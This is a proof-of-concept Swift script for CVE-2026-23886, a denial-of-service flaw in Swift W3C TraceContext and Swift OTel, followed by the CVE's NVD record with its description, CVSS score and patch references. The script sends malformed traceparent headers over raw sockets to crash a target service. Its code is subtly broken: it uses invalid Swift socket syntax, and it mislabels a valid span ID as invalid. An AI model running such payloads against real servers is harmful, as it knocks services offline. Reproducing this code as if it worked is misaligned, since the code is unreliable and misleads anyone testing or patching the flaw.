CVE-2026-23886

import Foundation // CVE-2026-23886 PoC - Malformed HTTP Header DoS // Target: Swift W3C TraceContext < 1.0.0-beta.5 // Swift OTel < 1.0.4 let targetHost = "127.0.0.1" let targetPort = 8080 // Malformed traceparent headers that can trigger the vulnerability let maliciousHeaders = [ // Invalid trace ID length "traceparent: 00-0000000000000000000000000000000-0000000000000001-01", // Invalid span ID length "traceparent: 00-0af7651916cd43dd8448eb211c80319c-b7ad6b7169203331-01", // Invalid version "traceparent: ff-0af7651916cd43dd8448eb211c80319c-b7ad6b7169203331-01", // Truncated header "traceparent: 00-0af7651916cd43dd8448eb211c80319c-", // Empty trace ID "traceparent: 00--b7ad6b7169203331-01", // Invalid characters in trace ID "traceparent: 00-0af7651916cd43dd8448eb211c80319g-b7ad6b7169203331-01" ] for (index, header) in maliciousHeaders.enumerated() { print("Sending malicious header \(index + 1)...") // Construct HTTP request with malformed traceparent header let httpRequest = """ GET / HTTP/1.1\r Host: \(targetHost):\(targetPort)\r \(header)\r User-Agent: CVE-2026-23886-PoC\r Connection: close\r \r """ // Send request to target server if let socket = try? Socket tcpSocketTo: targetHost, port: targetPort { try? socket.write(httpRequest) print("Malicious request sent: \(header)") } } print("PoC execution completed. Check if target service crashed.")

{"cve": {"id": "CVE-2026-23886", "sourceIdentifier": "[email protected]", "published": "2026-01-19T21:15:52.597", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Swift W3C TraceContext is a Swift implementation of the W3C Trace Context standard, and Swift OTel is an OpenTelemetry Protocol (OTLP) backend for Swift Log, Swift Metrics, and Swift Distributed Tracing. Prior to Swift W3C TraceContext version 1.0.0-beta.5 and Swift OTel version 1.0.4, a denial-of-service vulnerability due to improper input validation allows a remote attacker to crash the service via a malformed HTTP header. This allows crashing the process with data coming from the network when used with, for example, an HTTP server. Most common way of using Swift W3C Trace Context is through Swift OTel. Version 1.0.0-beta.5 of Swift W3C TraceContext and version 1.0.4 of Swift OTel contain a patch for this issue. As a workaround, disable either Swift OTel or the code that extracts the trace information from an incoming header (such as a `TracingMiddleware`)."}, {"lang": "es", "value": "Swift W3C TraceContext es una implementación en Swift del estándar W3C Trace Context, y Swift OTel es un backend del Protocolo OpenTelemetry (OTLP) para Swift Log, Swift Metrics y Swift Distributed Tracing. Antes de Swift W3C TraceContext versión 1.0.0-beta.5 y Swift OTel versión 1.0.4, una vulnerabilidad de denegación de servicio debido a una validación de entrada incorrecta permite a un atacante remoto bloquear el servicio a través de un encabezado HTTP malformado. Esto permite bloquear el proceso con datos provenientes de la red cuando se usa con, por ejemplo, un servidor HTTP. La forma más común de usar Swift W3C Trace Context es a través de Swift OTel. La versión 1.0.0-beta.5 de Swift W3C TraceContext y la versión 1.0.4 de Swift OTel contienen un parche para este problema. Como solución alternativa, deshabilite Swift OTel o el código que extrae la información de rastreo de un encabezado entrante (como un 'TracingMiddleware')."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://github.com/swift-otel/swift-otel/releases/tag/1.0.4", "source": "[email protected]"}, {"url": "https://github.com/swift-otel/swift-w3c-trace-context/commit/5da9b143ba6046734de3fa51dafea28290174e4e", "source": "[email protected]"}, {"url": "https://github.com/swift-otel/swift-w3c-trace-context/releases/tag/1.0.0-beta.5", "source": "[email protected]"}, {"url": "https://github.com/swift-otel/swift-w3c-trace-context/security/advisories/GHSA-mvpq-2v8x-ww6g", "source": "[email protected]"}]}}